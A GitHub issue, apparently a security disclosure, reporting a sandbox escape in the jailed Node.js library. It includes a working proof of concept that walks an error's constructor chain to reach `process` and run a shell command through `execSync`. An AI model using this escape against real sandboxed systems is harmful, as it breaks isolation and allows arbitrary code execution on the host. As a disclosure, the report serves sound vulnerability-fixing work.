Sandbox Escape Bug in jailed with Node.js
seongil-wi opened this issue · comments
Seongil Wi commented
- Jailed version: 0.3.1
- Node version: 18.15.0

run-jailed.js

```js
var jailed = require('jailed');
var api = {};
var plugin = new jailed.Plugin('./test_case.js', api);
```

test_case.js

```js
try {
    this.__defineGetter__("x", eval);
    eval.toString = toLocaleString
    eval < x
} catch (pp) {
    pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}
application.disconnect();
```
The sandbox can be escaped with three lines of code (notice that each line of code is essential to triggering the bug).
We can execute arbitrary shell code using the `process` module.